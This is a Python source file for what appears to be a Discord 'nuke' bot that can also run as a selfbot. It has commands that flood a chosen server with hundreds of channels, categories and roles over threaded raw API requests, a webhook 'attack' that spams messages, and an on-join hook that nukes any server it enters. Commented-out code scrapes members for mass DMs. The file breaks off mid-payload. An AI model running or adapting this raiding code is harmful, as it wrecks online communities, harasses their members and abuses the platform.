print(f'| {Fore.MAGENTA}+ Permission given to ')
for permission in settings['permissions']:
print(f'| | {permission}')
print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
if is_selfbot:
print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
else:
print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
print('| ~*************************************')
print('\\+-----')
@client.event
async def on_disconnect():
'''
on_disconnect - when the script is disconnected with the profile the bot will run this command
usage: reset status
'''
await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
"""
Logging messages to the user
no args, but has settings.
Modes:
- Discord side
- coming soon
"""
if want_log_message:
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog(message, True)
# else:
try:
await ctx.send(message)
except discord.errors.HTTPException:
for i in range(ceil(len(message) / 2000)):
await log(ctx, message[2000 * i:2000 * (i + 1)])
except:
consoleLog(message)
def consoleLog(message, print_time=False):
if want_log_console:
TIME = ''
if print_time:
TIME = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
try:
print(f'{TIME}{message}')
except TypeError: # when there's a character that can't be logged with python print function.
sys.stdout.buffer.write(f'{TIME}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
# source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
# source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
"""
Error handlers
It's always a good idea to look into the source code to find things that are hard to find on the internet.
"""
# Debug mode
# raise error
if not want_log_errors or hasattr(ctx.command, 'on_error'):
return
# get the original exception
error = getattr(error, 'original', error)
# print(error)
# print(str(type(error)))
if isinstance(error, commands.CommandNotFound):
if checkPerm(ctx):
try:
await log(ctx, f'Command `{ctx.message.content}` is not found.')
except discord.errors.HTTPException:
await log(ctx, 'That command is not found.')
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, discord.Forbidden):
await log(ctx, f'403 Forbidden: Missing permission.')
elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
# has already been handled in "def log"
pass
elif isinstance(error, commands.UserInputError):
await log(ctx, 'Invalid input.')
else:
# 'args', 'code', 'response', 'status', 'text', 'with_traceback'
# print(error)
# print(error.args)
# print(type(error.args))
try: # Don't want too many things logged into discord
await log(ctx, '%s' % error.args)
except discord.errors.NotFound: # When ctx.channel is deleted
pass
except TypeError: # When there's a charater that can't be logged into discord. Like if error.args contains a tuple which can't be automatically turned into a string.
consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
@client.event
async def on_message(message):
if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
if message.author.id == client.user.id and not selfbot_has_perm:
consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t of the power to use this bot.', True)
return
message.author = client.user
await client.process_commands(message)
@client.event
async def on_guild_join(guild):
if nuke_on_join:
global selected_server
selected_server = guild
await nuke(saved_ctx)
def isDM(ctx):
"""
No args
Checking if the ctx is whether from DM or in a server. There are different handlers for handling some commands.
"""
return isinstance(ctx.channel, discord.channel.DMChannel)
# if isinstance(ctx.channel, discord.channel.DMChannel):
# return True # in dm
# return False # in server
def nameIdHandler(name):
"""
<@! ID > = pinging user
<@& ID > = pinging role
Usage - remove the brakets around the ID
return - the ID
"""
if name.startswith('<@!') or name.startswith('<@&'):
return name[:-1][3:]
return name
async def embed(ctx, n, title, array):
"""
Parameters:
n - page number. And default is 1
title - Command name/title
array - The list for handling
"""
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
ids = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item.name) > 17:
item.name = item.name[:17] + '...'
names += f'{item.name}\n'
ids += f'{str(item.id)}\n '
# if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
# names = names.split('\n')
# ids = ids.split(' ')
# consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
# else:
try:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Name', value=names, inline=True)
embed.add_field(name='ID', value=ids, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
names = names.split('\n')
ids = ids.split(' ')
await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
async def hasTarget(ctx):
"""
Checking if there's a selected server for using the comands.
"""
if selected_server is not None:
return True
elif not isDM(ctx):
await connect(ctx)
await log(ctx, f'You have been automatically `{settings["command_prefix"]}connect` to server `{selected_server.name}` because you are not connected to a server and using a command inside a server.')
return True
else:
await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more infomation about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
for aliase in command.aliases:
help_command += f'|{aliase}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', alises=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', alises=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
selected_server.create_custom_emoji(name=(name), image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find role `{name}`.')
await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find `{name}`.')
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.text_channels, channel_name)
if channel is None:
await log(ctx, f'Unable to find text channel `{channel_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.voice_channels, VC_name)
if channel is None:
await log(ctx, f'Unable to find voice channel `{VC_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.categories, category_name)
if channel is None:
await log(ctx, f'Unable to find category `{category_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
emoji = containing(selected_server.emojis, name)
if emoji is None:
await log(ctx, f'Unable to find channel `{name}`.')
try:
await emoji.delete(reason=None)
await (ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
while True:
requesting, url, headers, payload = q.get()
try:
# proxy = randomProxy('https')
# r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
if r.status_code == 429:
r = r.json()
if want_log_request:
if isinstance(r['retry_after'], int): # Discord will return all integer time if the retry after is less then 10 seconds which is in miliseconds.
r['retry_after'] /= 1000
if r['retry_after'] > 5:
consoleLog(f'Rate limiting has been reached, and this request has been cancelled due to retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
q.task_done()
continue
consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
q.put((requesting, url, headers, payload))
elif want_log_request and 'code' in r:
consoleLog('Request cancelled due to -> ' + r['message'])
except json.decoder.JSONDecodeError:
pass
# except requests.exceptions.ProxyError:
# consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
# q.put((requesting, url, headers, payload))
except requests.exceptions.ConnectTimeout:
consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long {proxy}')
q.put((requesting, url, headers, payload))
except Exception as e:
consoleLog(f'Unexpected error: {str(e)}')
q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
await log(ctx, f'More arguments is requested. You can put how many webhooks you want to create or channel id/name on the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
if int(name) < 0:
await log(ctx, f'You thought a smol negative number will break this bot?')
return
if len(channels) == 1 and int(name) <= 50: ## probably will replace this with auto check channel id
channels = selected_server.text_channels
if int(name) > len(channels):
await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t what to add more text channels. You can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
return
for i in range(int(name)):
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
q.join()
await log(ctx, f'`{name}` webhooks has been created.')
elif len(channels) == 1 and int(name) < 100000000:
await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
else:
for channel in channels:
checked_channel = containing(selected_server.text_channels, channel)
if checked_channel is None:
await log(ctx, f'Cannot find channel {channel}.')
continue
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
args.pop(0) # Removing the attack keyword
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
